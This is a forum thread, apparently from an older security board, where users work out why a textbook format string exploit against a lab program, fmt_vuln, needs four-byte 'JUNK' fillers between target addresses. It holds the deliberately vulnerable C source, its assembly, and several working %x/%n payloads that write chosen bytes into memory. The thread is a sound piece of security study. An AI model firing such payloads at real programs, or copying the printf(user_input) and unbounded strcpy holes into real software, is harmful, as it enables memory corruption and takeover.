-
format string : Question
I found a format string tutorial in a book. Have understood the basic concept, but have a question about one of the examples. The aim is to write the address 0xddccbbaa into a static int variable declared in a program fmt_vuln. The book says that first you write 0xaa like this:
./fmt_vuln `printf "\x70\x97\x04\x08"`%x.%x.%153x%n
which works. Then, it says that in order to write 0xbb we need to increment the byte count upto 187 which is 0xbb in decimal. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049770. The word "JUNK" is four bytes and is fine. Similarly for writing 0xcc and 0xdd
So according to the book, the entire write procedure would be:
./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08JUNK\x72\x97\x04\x08JUNK\x73\x97\x04\x08"`%x.%x.%129x%n%17x%n%17x%n%17x%n
My question is: Why do we need the four bytes of JUNK separating the addresses even thought we can control the number of bytes by using the size of %x as in %129x??
Thanks
-
Wild guess: Required memory space padding. This isn't an uncommon practice. If you ping certain OSes and look at a packet capture, you'll see they pad the packets with "junk" like 1234567890....
--Th13
-
Now here's a first :
I haven't a clue as to how to respond ............... yet the answer from TH13 made perfect sense :)
is this a sign of advancement into geekhood ?
or is it just advancing old age :D
[edit]
the greens are from me for the confusion ........:)
-
I thought about the padding, but the problem with that is that each of the writes (0xaa, 0xbb,...) is two hex digits, which is equal to one byte. Now each memory address can hold one byte. So where is the padding (that too, 4 bytes) required?? :confused:
This is confusing, Help!!
-
This is a very interesting analysis of format string bugs. I've been looking over it most of the afternoon and decided to share. Even if you can't use it it's got a lot of good information.
Analysis of Format String Bugs (PDF)
-
I am pretty sure that TheHorse is correct in his assumption that these are used for padding. You are attempting to write an address into some variable and it is necessary to make sure the bytes are properly aligned in memory. This is similar to how the return address in buffer overflows have to be properly aligned to fit into the correct memory location. If things are not properly aligned (padded), then the wrong address would get written.
-
Modern processors actually take longer to read just one byte instead of 4. IIRC it's because of the way the addressbus accesses memory. So it could be some compiler optimization. You store just one byte but the compiler modifies it to 4 (the actual byte and 3 bytes padded). That could improve the speed of the program (size-speed trade-off).
One way to find out though is to run your program (including the 'exploit') using a debugger. That will give you chance to look at what the stack actually looks like when it gets 'hit'.
-
SirDice is right, most processors read blocks of 4 bytes or more (normaly whatever the word size is although it varies slightly), so optimization is probably a good guess. Is it possible to contact the author for comment?
-
But the compiler doesn't see the format string. The format string is entered as a parameter to an already compiled (exploitable) program (usually taking advantage of printf(string) instead of printf(%s, string)). So the compiler itself does not ever see the format string because it is entered as a parameter. I am almost 100% sure that this is to ensure that the data being entered (the address to be stored) lines up correctly in memory (dealing with word size).
-
Padding seems most obvious but HOW does it need padding? As I wrote earlier each of the writes (0xaa, 0xbb,...) is two hex digits, which is equal to one byte. Now each memory address can hold one byte. So where is the padding (that too, 4 bytes) required??
The processor does read 4 bytes (1 word) but that would mean that it reads all the four consecutive memory addresses. There is no need for the junk, which in any case would add to one byte in the address to make 5 bytes not 4.
Hopefully we can sort this out :/
-
I had refrained from responding since I wasn't sure, but since we are in the guessing stage :)
Is there anyway you can post the ASM source ? Could there be possibly other things that were pushed on a stack or heap that you are trying to make sure is properly accounted for ?
-
Here's the source for fmt_vuln.c
-----------------------------------------
#include <stdlib.h>
int main(int argc, char *argv[])
{
char text[1024];
static int test_val = -72;
if(argc < 2)
{
printf("Usage: %s <text to print>\n", argv[0]);
exit(0);
}
strcpy(text, argv[1]);
printf("The right way:\n");
// The right wat to print user-controlled input:
printf("%s", text);
// ---------------------------------------------
printf("\nThe wrong way:\n");
// The wrong way to print user-controlled input:
printf(text);
// ---------------------------------------------
printf("\n");
// Debug output
printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);
exit(0);
}
-
Kind of off the point, but wouldn't:
char text[1024]; .. strcpy(text, argv[1]);
Be ripe for a little buffer overflow action ?
Anyway, I don't have a windows compiler so I can't convert this to the ASM as needed. But looking at the C, if I had to make an educated guess, I would say that the reason for the junk is the program is that it may be trying to overwrite a specific portion of the program to put in your own addresses and the junk is necessary to make it come out right on the stack. Its really hard to say though without seeing it. I recommend you download OllyDbg or IDA, compile the program and load the EXE there and set the breakpoint at the function call, then you can watch it in action.
-
nebulus, I'm using Gentoo Linux, not Windows (Why did you assume that :D )
I have already tried viewing stuff using gdb but couldn't get anything. Perhaps its because when I installed Gentoo I put compiler optimizations including -omit-frame-pointer in the make.conf file. Can I disable this while compiling a file, if yes then how?
Here's the ASM created by gcc without the gdb (-g) option:
.file "fmt_vuln.c"
.data
.align 4
.type test_val.0, @object
.size test_val.0, 4
test_val.0:
.long -72
.section .rodata
.LC0:
.string "Usage: %s <text to print>\n"
.LC1:
.string "The right way:\n"
.LC2:
.string "%s"
.LC3:
.string "\nThe wrong way:\n"
.LC4:
.string "\n"
.align 4
.LC5:
.string "[*] test_val @ 0x%08x = %d 0x%08x\n"
.text
.globl main
.type main, @function
main:
pushl %ebp
movl %esp, %ebp
subl $1032, %esp
andl $-16, %esp
movl $0, %eax
addl $15, %eax
addl $15, %eax
shrl $4, %eax
sall $4, %eax
subl %eax, %esp
cmpl $1, 8(%ebp)
jg .L2
subl $8, %esp
movl 12(%ebp), %eax
pushl (%eax)
pushl $.LC0
call printf
addl $16, %esp
subl $12, %esp
pushl $0
call exit
.L2:
subl $8, %esp
movl 12(%ebp), %eax
addl $4, %eax
pushl (%eax)
leal -1032(%ebp), %eax
pushl %eax
call strcpy
addl $16, %esp
subl $12, %esp
pushl $.LC1
call printf
addl $16, %esp
subl $8, %esp
leal -1032(%ebp), %eax
pushl %eax
pushl $.LC2
call printf
addl $16, %esp
subl $12, %esp
pushl $.LC3
call printf
addl $16, %esp
subl $12, %esp
leal -1032(%ebp), %eax
pushl %eax
call printf
addl $16, %esp
subl $12, %esp
pushl $.LC4
call printf
addl $16, %esp
pushl test_val.0
pushl test_val.0
pushl $test_val.0
pushl $.LC5
call printf
addl $16, %esp
subl $12, %esp
pushl $0
call exit
.size main, .-main
.section .note.GNU-stack,"",@progbits
.ident "GCC: (GNU) 3.4.2 20041017 (Red Hat 3.4.2-6.fc3)"
-
Ah, some progress!! This is very interesting:
The following 2 commands do the same thing, i.e. print 0x0000bbaa to the memory address.
./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08"`%x%x%142x%n%17x%n
./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n12345678912345678%n
So 146 in the second makes sense as compared to 142 in the first because the second does not have 4 bytes of JUNK.
In the first, we have %17x after the first %n because (0xbb - 0xaa) is 17. In the second we achive the same purpose with 12345678912345678 which is 17 bytes.
Now the confusing part is that the following command does not work (segmentation fault) even though it seems it should, looking at the above two commands:
./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n%17x%n
This command should do the same thing as the one with 12345678912345678 right!!
-
Not exactly. Using %x doesnt let you control the bytes it lets you control the # bytes output by converting to hex and padding the parameter thats popped from the format function stack (it will always read sizeof(int) usually 4 bytes from the stack). Dont forget that each time you %x you are changing the format functions stack pointer, and are walking down the stack. So it performs two functions, it allows you to manipulate the number of bytes outputted by the printf (which you use for %n to write) but it also is how you move back (or 'dig up') through the stack to insure your address is being pointed at when the %n writes. The JUNK may be there just so you can pop them off and add 17 to the output counter. Try either: w/o the JUNK or %17x's (just use 17 fillers like above) or: with the pops(%17x's) and the JUNKs added after the addresses. Let me know how it works out, I'm curious.
-Maestr0
-
OH! So %17x would go down the memory only once and pad it, I knew that %x would go down the memory by 4 bytes and it seemed obvious that %17x would thus go down by 17*4 = 68 bytes!!
The two conditions you want (below), as I said in the last post, do work. And now we know why it does. :D
./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08"`%x%x%142x%n%17x%n
./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n12345678912345678%n
And now we know why the following doesn't work, since the %17x makes the stack grow and hence overshoot the 2nd address. :D
./fmt_vuln `printf "\x70\x97\x04\x08\x71\x97\x04\x08"`%x%x%146x%n%17x%n
Maestr0 has saved the day. Actually more than a day!